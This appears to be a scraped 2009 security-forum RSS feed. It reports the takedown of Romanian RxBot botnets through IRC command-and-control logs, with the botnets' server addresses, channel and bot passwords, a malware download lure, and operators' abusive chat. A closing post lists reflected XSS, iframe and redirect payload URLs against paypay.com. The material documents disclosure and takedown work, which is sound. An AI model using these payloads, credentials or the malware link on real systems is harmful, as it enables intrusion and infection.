    [2009-06-05 17:30] *** Joins: [B]-96914
    [2009-06-05 17:30] *** Parts: [B]-96914
    [2009-06-05 17:31] *** Joins: [B]-49701
    [2009-06-05 17:33] *** Joins: [B]-61842
    [2009-06-05 17:33] <[-1-]6543> .log
    [2009-06-05 17:33] <[-1-]6543> .login hasmepeleu
    [2009-06-05 17:33] <[B]-49701> [MAIN]: Password accepted.
    [2009-06-05 17:33] <[-1-]6543> .log
    [2009-06-05 17:33] <[B]-49701> [LOG]: Begin
    [2009-06-05 17:33] <[B]-49701> [06-05-2009 17:25:21] [MAIN]: User: [-1-]6543 logged in.
    [2009-06-05 17:33] <[B]-49701> [06-05-2009 17:23:20] [MAIN]: Joined channel: #hasmocaru.
    [2009-06-05 17:33] <[B]-61842> [MAIN]: Password accepted.
    [2009-06-05 17:33] <[B]-49701> [06-05-2009 17:23:04] [MAIN]: Connected to rocking-dns.no-ip.org.
    [2009-06-05 17:33] <[B]-61842> [LOG]: Begin
    [2009-06-05 17:33] <[B]-49701> [06-05-2009 17:23:02] [IDENTD]: Server running on Port: 113.
    [2009-06-05 17:33] <[B]-61842> [06-05-2009 17:25:39] [MAIN]: User: [-1-]6543 logged in.
    [2009-06-05 17:33] <[B]-49701> [06-05-2009 17:23:02] [MAIN]: Bot started.
    [2009-06-05 17:33] <[B]-61842> [06-05-2009 17:25:32] [MAIN]: Joined channel: #hasmocaru.
    [2009-06-05 17:33] <[B]-49701> [LOG]: List complete.
    [2009-06-05 17:33] <[B]-61842> [06-05-2009 17:25:30] [IDENTD]: Client connection from IP: 195.93.140.133:56981.
    [2009-06-05 17:33] <[B]-61842> [06-05-2009 17:25:30] [MAIN]: Connected to rocking-dns.no-ip.org.
    [2009-06-05 17:33] <[B]-61842> [06-05-2009 17:25:30] [IDENTD]: Server running on Port: 113.
    [2009-06-05 17:33] *** Joins: [B]-28504
    [2009-06-05 17:33] <[B]-61842> [06-05-2009 17:25:30] [MAIN]: Bot started.
    [2009-06-05 17:33] <[B]-61842> [LOG]: List complete.
    [2009-06-05 17:33] *** Joins: [B]-16904
    [2009-06-05 17:37] *** Joins: [B]-93349
    [2009-06-05 17:37] <[B]-61842> [MAIN]: Password accepted.
    [2009-06-05 17:37] <[B]-61842> [MAIN]: Removing Bot.
    [2009-06-05 17:37] <[B]-93349> [MAIN]: Password accepted.
    [2009-06-05 17:37] <[B]-49701> [MAIN]: Password accepted.
    [2009-06-05 17:37] <[B]-49701> [MAIN]: Removing Bot.
    [2009-06-05 17:37] <[B]-93349> [MAIN]: Removing Bot.
    [2009-06-05 17:37] *** Parts: [B]-61842
    [2009-06-05 17:37] *** Parts: [B]-49701
    [2009-06-05 17:37] *** Parts: [B]-93349
    [2009-06-05 17:38] <[B]-28504> [MAIN]: Password accepted.
    [2009-06-05 17:38] <[B]-28504> [MAIN]: Removing Bot.
    [2009-06-05 17:38] <[B]-16904> [MAIN]: Password accepted.
    [2009-06-05 17:38] <[B]-16904> [MAIN]: Removing Bot.
    [2009-06-05 17:38] *** Parts: [B]-28504
    [2009-06-05 17:38] *** Parts: [B]-16904
    [2009-06-05 17:39] *** Parts: FrEaK
    [2009-06-05 17:40] <[-1-]6543> .login hasmepeleu
    [2009-06-05 17:40] *** Joins: [B]-21303
    [2009-06-05 17:40] <[-1-]6543> .logout
    [2009-06-05 17:40] <[-1-]6543> .login hasmepeleu
    [2009-06-05 17:41] <[B]-21303> [MAIN]: Password accepted.
    [2009-06-05 17:41] *** Parts: [-1-]6543
    [2009-06-05 17:41] <[B]-21303> [MAIN]: Password accepted.
    [2009-06-05 17:41] <[B]-21303> [MAIN]: Removing Bot.
    [2009-06-05 17:41] *** Parts: [B]-21303
    [2009-06-05 17:46] *** Joins: [B]-95159
    [2009-06-05 17:47] <[B]-95159> [MAIN]: Password accepted.
    [2009-06-05 17:47] <[B]-95159> [MAIN]: Removing Bot.
    [2009-06-05 17:47] *** Parts: [B]-95159
    [2009-06-05 17:47] *** Joins: [B]-02696
    [2009-06-05 17:47] *** Parts: [B]-02696
    [2009-06-05 17:48] *** Joins: [B]-03689
    [2009-06-05 17:51] <[B]-03689> [MAIN]: Password accepted.
    [2009-06-05 17:51] <[B]-03689> [MAIN]: Removing Bot.
    [2009-06-05 17:51] *** Parts: [B]-03689
    [2009-06-05 17:55] *** Joins: [B]-50837
    [2009-06-05 17:55] *** Joins: [B]-69330
    [2009-06-05 17:56] <[B]-50837> [MAIN]: Password accepted.
    [2009-06-05 17:56] <[B]-50837> [MAIN]: Removing Bot.
    [2009-06-05 17:56] *** Parts: [B]-50837
    [2009-06-05 17:56] <[B]-69330> [MAIN]: Password accepted.
    [2009-06-05 17:56] <[B]-69330> [MAIN]: Removing Bot.
    [2009-06-05 17:56] *** Parts: [B]-69330
    [2009-06-05 17:56] *** Joins: [B]-30051
    [2009-06-05 17:56] *** Parts: [B]-30051
    [2009-06-05 17:59] *** Disconnected


    The address was banned by no-ip,
    -TE- wrote:
    [2009-06-05 19:22] <-TE-> The address rocking-dns.no-ip.org changed the IP from 195.93.140.133 to 0.0.0.0 (botnet server)

    ]]>
    http://nemesis.te-home.net/Forum/3000_News/20090605_Shutdown_of__Hack_elite__botnets.html Fri, 5 Jun 2009 19:03:07 GMT 210414598
    <![CDATA[Shutdown of "Hack-elite" botnets part 2]]> http://nemesis.te-home.net/Forum/3000_News/20090605_Shutdown_of__Hack_elite__botnets.html
    dc.underground-network.ro wrote:
    [18:20] Private message from UnderGrounD™: <HkEcstasy>


    Vrei viteza mai mare de download?ok! intra pe http://fastdown.xyo.ro/extreme_speed.exe si instaleaza extreme_speed

    [18:32] Private message from UnderGrounD™: <HkEcstasy>


    Vrei viteza mai mare de download?ok! intra pe http://fastdown.xyo.ro/extreme_speed.exe si instaleaza extreme_speed
    [18:32] <UnderGrounD™>
    [::] Reg Information:
    [::] Nick: HkEcstasy
    [::] Class: 10
    [::] Password set:Yes
    [::] Last login: Fri Jun  5 01:51:35 2009
    [::] Last IP: 195.93.141.6
    [::] Last error: Thu Jan  1 02:00:00 1970
    [::] Error IP:
    [::] Login count: 622
    [::] Login errors: 0
    [::] Protected: No
    [::] Hidden kicks: No
    [::] Hidden keys: No
    [::] Hidden share: Yes
    [::] Registered since: Mon Feb 16 23:42:09 2009
    [::] Registered by: aldo
    [::] Alternate IP:


    RxBot settings:
    • Server: secure.oficialdc.ro:7219
    • Server password: asd123
    • Channel: #plugin
    • Channel password: lualib
    • Prefix for bots: [B]-* or [M][B]-*
    • Login password for bots: ezechiele
    • Bot's new about information: FrEaK-BoT [RxBot v7.6 modded by FrEaKaZoId]
    • User command to remove bots:
      favorites.xml wrote:
      <UserCommand Type="2" Context="2" Name="#plugin Uninstall bot" Command="$To: %[nick] From: %[mynick] $<%[mynick]> .login ezechiele|$To: %[nick] From: %[mynick] $<%[mynick]> .remove|" Hub=""/>


    secure.oficialdc.ro:7219/#plugin wrote:
    [2009-06-05 18:54] *** Connected
    [2009-06-05 18:54] *** Joins: Lithium
    [2009-06-05 18:54] *** Joins: [M][B]-463885
    [2009-06-05 18:54] *** Looking up your hostname
    [2009-06-05 18:54] *** Found your hostname, cached
    [2009-06-05 18:54] *** Checking Ident
    [2009-06-05 18:54] *** No ident response
    [2009-06-05 18:54] <my.server.name> MODE :Register first.
    [2009-06-05 18:54] <my.server.name> Welcome to the Internet Relay Network [M][B]-46
    Your host is my.server.name, running version beware1.5.7
    This server was created Tue Jul 13 2004 at 20:36:17 GMT
    my.server.name beware1.5.7 dgikoswx biklmnoprstv
    MAP SILENCE=15 WHOX WALLCHOPS WALLVOICES USERIP CPRIVMSG CNOTICE MODES=6 MAXCHANNELS=10 MAXBANS=45 :are supported by this server
    [2009-06-05 18:54] <my.server.name> NICKLEN=9 TOPICLEN=160 AWAYLEN=160 KICKLEN=160 CHANTYPES=#& PREFIX=(ov)@+ CHANMODES=b,k,l,rimnpst CASEMAPPING=rfc1459 :are supported by this server
    There are 18 users and 2 invisible on 1 servers
    1 :operator(s) online
    1 :channels formed
    I have 20 clients and 0 servers
    [2009-06-05 18:54] *** [M][B]-46 Highest connection count: 23 (23 clients)
    [2009-06-05 18:54] <my.server.name> MOTD File is missing
    [2009-06-05 18:54] *** [M][B]-46 on 1 ca 1(4) ft 10(10) tr
    [2009-06-05 18:54] *** Joins: [M][B]-46
    [2009-06-05 18:54] *** Joins: [B]-80324
    [2009-06-05 18:54] *** Joins: [B]-74114
    [2009-06-05 18:54] *** Joins: [B]-16683
    [2009-06-05 18:54] *** Joins: [B]-76846
    [2009-06-05 18:54] *** Joins: [B]-59887
    [2009-06-05 18:54] *** Joins: [B]-73030
    [2009-06-05 18:54] *** Joins: [B]-61495
    [2009-06-05 18:54] *** Joins: [B]-78868
    [2009-06-05 18:54] *** Joins: [B]-58358
    [2009-06-05 18:54] *** Joins: [B]-25225
    [2009-06-05 18:54] *** Joins: [B]-36520
    [2009-06-05 18:54] *** Joins: [B]-54656
    [2009-06-05 18:54] *** Joins: [B]-18925
    [2009-06-05 18:54] *** Joins: [B]-69030
    [2009-06-05 18:54] *** Joins: [B]-23144
    [2009-06-05 18:54] *** Joins: [B]-39519
    [2009-06-05 18:54] <[B]-hkecs> :(
    [2009-06-05 18:54] <my.server.name>
    ~_ 93-113-219-179.urbantelecom.ro * :[B]-Dark
    @#plugin
    my.server.name :I'm too lazy to edit ircd.conf
    27 1244214816 :seconds idle, signon time
    End of /WHOIS list.

    [2009-06-05 18:54] <my.server.name>
    FrEaKaZoId 89.45.94.27 * :[B]-23238
    @#plugin
    my.server.name :I'm too lazy to edit ircd.conf
    is an IRC Operator
    109 1244213625 :seconds idle, signon time
    End of /WHOIS list.

    [2009-06-05 18:54] <my.server.name>
    hkecstasy 195.93.141.6 * :[B]-hkecstasy
    @#plugin
    my.server.name :I'm too lazy to edit ircd.conf
    17 1244213505 :seconds idle, signon time
    End of /WHOIS list.

    [2009-06-05 18:54] <[B]-Darky> plm ma
    [2009-06-05 18:54] <[B]-Darky> atsa e
    [2009-06-05 18:55] <[B]-hkecs> buh
    [2009-06-05 18:55] <[B]-Darky> * [M][B]-46 (~lmkkhnq@anonymizer2.blutmagie.de) has joined #plugin
    [2009-06-05 18:55] <[B]-Darky> wtf
    [2009-06-05 18:55] <[B]-36520> [MAIN]: Password accepted.
    [2009-06-05 18:55] <[B]-36520> [MAIN]: Removing Bot.
    [2009-06-05 18:55] *** Parts: [B]-36520
    [2009-06-05 18:55] <[B]-hkecs> :-?
    [2009-06-05 18:55] <Lithium> .login ezechiele
    [2009-06-05 18:55] <Lithium> .remove
    [2009-06-05 18:55] <[B]-23144> [MAIN]: Password accepted.
    [2009-06-05 18:55] <[B]-18925> [MAIN]: Password accepted.
    [2009-06-05 18:55] <[B]-54656> [MAIN]: Password accepted.
    [2009-06-05 18:55] <[B]-69030> [MAIN]: Password accepted.
    [2009-06-05 18:55] <[B]-78868> [MAIN]: Password accepted.
    [2009-06-05 18:55] <[B]-25225> [MAIN]: Password accepted.
    [2009-06-05 18:55] <[B]-80324> [MAIN]: Password accepted.
    [2009-06-05 18:55] <[B]-58358> [MAIN]: Password accepted.
    [2009-06-05 18:55] <[B]-61495> [MAIN]: Password accepted.
    [2009-06-05 18:55] <[B]-76846> [MAIN]: Password accepted.
    [2009-06-05 18:55] <[B]-16683> [MAIN]: Password accepted.
    [2009-06-05 18:55] <[B]-39519> [MAIN]: Password accepted.
    [2009-06-05 18:55] <[B]-74114> [MAIN]: Password accepted.
    [2009-06-05 18:55] <[B]-59887> [MAIN]: Password accepted.
    [2009-06-05 18:55] <[B]-25225> [MAIN]: Removing Bot.
    [2009-06-05 18:55] <[B]-69030> [MAIN]: Removing Bot.
    [2009-06-05 18:55] <[B]-18925> [MAIN]: Removing Bot.
    [2009-06-05 18:55] *** Parts: [B]-25225
    [2009-06-05 18:55] *** Parts: [B]-69030
    [2009-06-05 18:55] *** Parts: [B]-18925
    [2009-06-05 18:55] <[B]-54656> [MAIN]: Removing Bot.
    [2009-06-05 18:55] <[B]-23144> [MAIN]: Removing Bot.
    [2009-06-05 18:55] <[B]-78868> [MAIN]: Removing Bot.
    [2009-06-05 18:55] <[B]-76846> [MAIN]: Removing Bot.
    [2009-06-05 18:55] <[B]-80324> [MAIN]: Removing Bot.
    [2009-06-05 18:55] <[B]-58358> [MAIN]: Removing Bot.
    [2009-06-05 18:55] <[B]-61495> [MAIN]: Removing Bot.
    [2009-06-05 18:55] <[B]-16683> [MAIN]: Removing Bot.
    [2009-06-05 18:55] <[B]-39519> [MAIN]: Removing Bot.
    [2009-06-05 18:55] <[B]-74114> [MAIN]: Removing Bot.
    [2009-06-05 18:55] <[B]-59887> [MAIN]: Removing Bot.
    [2009-06-05 18:55] <[B]-73030> [MAIN]: Password accepted.
    [2009-06-05 18:55] *** Parts: [B]-54656
    [2009-06-05 18:55] *** Parts: [B]-23144
    [2009-06-05 18:55] *** Parts: [B]-78868
    [2009-06-05 18:55] *** Parts: [B]-76846
    [2009-06-05 18:55] *** Parts: [B]-80324
    [2009-06-05 18:55] *** Parts: [B]-58358
    [2009-06-05 18:55] *** Parts: [B]-61495
    [2009-06-05 18:55] *** Parts: [B]-16683
    [2009-06-05 18:55] *** Parts: [B]-39519
    [2009-06-05 18:55] *** Parts: [B]-74114
    [2009-06-05 18:55] *** Parts: [B]-59887
    [2009-06-05 18:55] *** Parts: [B]-73030
    [2009-06-05 18:55] <[B]-Darky> atat
    [2009-06-05 18:55] <[B]-hkecs> :))
    [2009-06-05 18:55] <[B]-Darky> hehe lz
    [2009-06-05 18:55] <[B]-Darky> cat ddos va luati diseara
    [2009-06-05 18:56] <[B]-hkecs> [B]-hkecs is kicking [M][B]-46 because: [M][B]-46
    [2009-06-05 18:56] *** Parts: [M][B]-46
    [2009-06-05 19:00] <[B]-Darky> da lz
    [2009-06-05 19:00] <[B]-Darky> mai vino odata
    [2009-06-05 19:00] <[B]-Darky> :)))
    [2009-06-05 19:00] <[B]-hkecs> ;))
    [2009-06-05 19:00] <[B]-hkecs> ce-i trag pe pula..
    [2009-06-05 19:00] <[B]-hkecs> pff
    [2009-06-05 19:00] <[B]-Darky> mai dai odata remove si ne cacam pe mata de ochelarist prost
    [2009-06-05 19:00] <[B]-hkecs> ii da degeaba
    [2009-06-05 19:00] <[B]-hkecs> :))
    [2009-06-05 19:00] *** Joins: [B]-53736
    [2009-06-05 19:00] <[B]-Darky> ia
    [2009-06-05 19:00] <[B]-Darky> dai la asta
    [2009-06-05 19:00] <[B]-Darky> nu fi fraier
    [2009-06-05 19:00] <[B]-Darky> :))
    [2009-06-05 19:00] <[B]-53736> [MAIN]: Password accepted.
    [2009-06-05 19:00] <[B]-53736> [MAIN]: Removing Bot.
    [2009-06-05 19:00] *** Parts: [B]-53736
    [2009-06-05 19:01] <[B]-Darky> ACTION listens to Linkin Park & Jay-Z - numb encore
    [2009-06-05 19:01] <[B]-FrEaK> we fuck your mama biatch ;))
    [2009-06-05 19:01] <[B]-Darky> e roman ma
    [2009-06-05 19:01] <[B]-Darky> sau e prostu de method
    [2009-06-05 19:02] <[B]-FrEaK> prostalaule eu esti ma
    [2009-06-05 19:02] <[B]-FrEaK> ?
    [2009-06-05 19:02] <[B]-FrEaK> dati-as cu buricu in frunte
    [2009-06-05 19:03] <[B]-Darky> hai sa tragem si noi in te :))
    [2009-06-05 19:03] <[B]-FrEaK> pai ar cam fi cazu ;))
    [2009-06-05 19:03] <[B]-FrEaK> ma labare da acuma simte-te si tu in sloboz si iesi
    [2009-06-05 19:04] <[B]-hkecs> ACTION slaps [M][B]-82 around a bit with a large trout
    [2009-06-05 19:04] <[B]-hkecs> :))
    [2009-06-05 19:04] <[B]-hkecs> [B]-hkecs is kicking [M][B]-82 because: [M][B]-82
    [2009-06-05 19:04] *** Parts: [M][B]-82
    [2009-06-05 19:06] *** Joins: [B]-10643
    [2009-06-05 19:07] <[B]-10643> [MAIN]: Password accepted.
    [2009-06-05 19:07] <[B]-10643> [MAIN]: Removing Bot.
    [2009-06-05 19:07] *** Parts: [B]-10643
    [2009-06-05 19:07] <[B]-hkecs> ma duc la masa brb
    [2009-06-05 19:08] <[B]-FrEaK> pb
    [2009-06-05 19:08] <my.server.name> Channel :Users  Name
    #plugin 4 :
    End of /LIST

    [2009-06-05 19:12] *** Disconnected

    secure.oficialdc.ro:7219 wrote:
    [19:12] *** Connecting to secure.oficialdc.ro:7219...
    [19:12] *** Connection refused by target machine


    You can download an updated RxBot Emulator with their botnets preconfigured from here: http://nemesis.te-home.net/Forum/3000_News/RxBotEmulator3.zip.
    ]]>
    http://nemesis.te-home.net/Forum/3000_News/20090605_Shutdown_of__Hack_elite__botnets.html Fri, 5 Jun 2009 19:03:07 GMT 210414598
    <![CDATA[PayPay.com - Multiple XSS ]]> http://nemesis.te-home.net/Forum/3100_Bad_Settings/31000_XSS/
    Code:
    https://www.paypay.com/user/user_help.php?help=h_pmt_opts_cov_ctrs&country=&lang="><script>alert(String.fromCharCode(88,83,83))</script>

    Code:
    https://www.paypay.com/?wid="><script>alert(12157312.477)</script>

    Code:
    https://www.paypay.com/user_pmt_order/user_pmt_account_form.php?lang=en&country_acc="><script>alert(String.fromCharCode(88,83,83))</script>

    Code:
    https://www.paypay.com/user_profile/forgot_pswd.php?country=228&lang="><script>alert(String.fromCharCode(88,83,83))</script>


    Iframe injection and Redirect on all vulnerable module

    poc:

    Code:
    https://www.paypay.com/user_profile/forgot_pswd.php?country=228&lang="<META HTTP-EQUIV="refresh" content="0; URL=http://nemesis.te-home.net">


    Code:
    https://www.paypay.com/user_profile/forgot_pswd.php?country=228&lang="><iframe src=index.htm
      

    More funny
    Code:
    https://www.paypay.com/user_profile/forgot_pswd.php?country=228&lang="><iframe src=http://www.scam.com/showthread.php?t=116218]paypay.com></iframe>

    http://img3.imageshack.us/img3/8250/30149756.jpg

    Some interesting things about this website

    http://www.scam.com/showthread.php?t=116218]paypay.com

    and what about this?

    Code:
    https://www.paypay.com/user/

    Code:
    https://www.paypay.com/user_pmt_order

    or  
    Code:
    https://www.paypay.com/user_profile/


    lol















    ]]>
    http://nemesis.te-home.net/Forum/3100_Bad_Settings/31000_XSS/ Fri, 5 Jun 2009 21:31:17 GMT 2990241855
    <![CDATA["BotNet By AbduL" - shutdown]]> http://nemesis.te-home.net/Forum/3000_News/